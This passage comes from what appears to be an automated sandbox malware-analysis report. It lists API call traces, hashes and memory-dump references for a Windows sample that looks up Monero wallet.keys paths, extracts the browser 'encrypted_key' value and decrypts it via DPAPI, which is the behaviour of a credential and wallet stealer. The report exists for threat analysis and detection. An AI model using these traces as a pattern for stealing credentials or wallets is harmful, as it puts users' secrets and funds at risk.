                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                              • Instruction ID: d6ffc9b9fc95058f3404cfa4c31e5175fee011c06f0c84c597251cff14cdf1dd
                              • Opcode Fuzzy Hash: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                              • Instruction Fuzzy Hash: 602145B1A40204AFDB14DF94ED45FAEBBB8FF48711F10411DF519A7284C7799941CBA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FC951E,00000000), ref: 00FC8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8D62
                              • wsprintfW.USER32 ref: 00FC8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                              • Instruction ID: 90b577a719f1b63bf012ab3574f7b16841afbf3b806d09f3860d7c71333e553d
                              • Opcode Fuzzy Hash: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                              • Instruction Fuzzy Hash: A1E08CB1A40208BFC724DB94E80AE6977B8EF44702F0001A8FD0E87280DAB59E409B91
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00FBA3FF
                              • lstrlen.KERNEL32(00000000), ref: 00FBA6BC
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                              • Instruction ID: 21ca0e65dff4f0f7aaf1427637991e22807d002674151c3fc9586a6d8cff4e6c
                              • Opcode Fuzzy Hash: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                              • Instruction Fuzzy Hash: EAE1DB7281010D9BDB18EBA4DE93FEE7338AF54304F50816DF51672091EE387A49EB66
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD481
                              • lstrlen.KERNEL32(00000000), ref: 00FBD698
                              • lstrlen.KERNEL32(00000000), ref: 00FBD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                              • Instruction ID: 7e873073a0e6edc34a273b52b12469a10ce51a73c8f5adaa84402bd04da29c83
                              • Opcode Fuzzy Hash: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                              • Instruction Fuzzy Hash: 67910C7281010D9BDB18EBA0DE97FEE7338AF54304F50416DF516A6091EF387A49EB62
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00DED7F0,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD801
                              • lstrlen.KERNEL32(00000000), ref: 00FBD99F
                              • lstrlen.KERNEL32(00000000), ref: 00FBD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00FBDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                              • Instruction ID: d5d09f1522e42409ef83b769e177af14e2bb0e62b68ae190203567afebf6f8df
                              • Opcode Fuzzy Hash: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                              • Instruction Fuzzy Hash: D181FB7291010D9BDB18EBA0DE97FEE7338AF54304F50412DF416A60D1EE387A49EB62
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00FD1580,00FD0D92), ref: 00FBF54C
                              • lstrlen.KERNEL32(00000000), ref: 00FBF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                              • Instruction ID: ccf0fbabeaa53f18e2c0c0134953871201edf12fee75785910061f7ad67edfbe
                              • Opcode Fuzzy Hash: 0c390623aa0613bfee079ee516af0e9bd22816d76d49bfb401b0fc5b306792d3
                              • Instruction Fuzzy Hash: 32511C71D0010DABDB04FBA0ED97EED7339AF54304F40852CE816661D1EE387A09EBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 33a6f2acc81efadc73b9b732c69658d90c6901c2ac7c7f719c57e62a1d0340fc
                              • Instruction ID: 6321ece2e164e3867b48a37be32685bb0a15a40e5cf524caf93816209c8492da
                              • Opcode Fuzzy Hash: 33a6f2acc81efadc73b9b732c69658d90c6901c2ac7c7f719c57e62a1d0340fc
                              • Instruction Fuzzy Hash: 28413D71D1010AABCB04EFA4DE46FEEB775EF54704F14841CE41667280EB79AA05EFA2
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                                • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                                • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                                • Part of subcall function 00FB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                                • Part of subcall function 00FB99C0: LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                                • Part of subcall function 00FB99C0: CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                                • Part of subcall function 00FC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00FC8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FB9D39
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9AEF
                                • Part of subcall function 00FB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B01
                                • Part of subcall function 00FB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FB4EEE,00000000,00000000), ref: 00FB9B2A
                                • Part of subcall function 00FB9AC0: LocalFree.KERNEL32(?,?,?,?,00FB4EEE,00000000,?), ref: 00FB9B3F
                                • Part of subcall function 00FB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00FB9B84
                                • Part of subcall function 00FB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00FB9BA3
                                • Part of subcall function 00FB9B60: LocalFree.KERNEL32(?), ref: 00FB9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 84d50258c54a1995242f434ef7d3687d31aa88695a1080e375b260b74feba9a5
                              • Instruction ID: 49a00196cf019c1442d28c1048bcfe9e04f42d2dd4071992120c48001b56db6e
                              • Opcode Fuzzy Hash: 84d50258c54a1995242f434ef7d3687d31aa88695a1080e375b260b74feba9a5
                              • Instruction Fuzzy Hash: 7B317CB6D00209ABCF04DFE5DD86EEEB7B8BF48304F144519EA01A3241EB749A04DBA1
                              APIs
                              • CreateFileA.KERNEL32(00FC3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00FC3AEE,?), ref: 00FC92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00FC3AEE), ref: 00FC9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00FC9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                              • Instruction ID: 434f8857262482add88784a44beb2b3318054ad78dc63fc63b7dfa9eb5fe76f3
                              • Opcode Fuzzy Hash: e6d2f9fb9f92240eb22bd8c05a3bf0ff79f68253756f3e6a63c813f0a6ef57e9
                              • Instruction Fuzzy Hash: A8F0A435E04204BBDB24DFB0ED49F9E77F9AB48320F10C658B615A71C4D7B5A6419F40
                              APIs
                              • __getptd.LIBCMT ref: 00FCC74E
                                • Part of subcall function 00FCBF9F: __amsg_exit.LIBCMT ref: 00FCBFAF
                              • __getptd.LIBCMT ref: 00FCC765
                              • __amsg_exit.LIBCMT ref: 00FCC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00FCC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
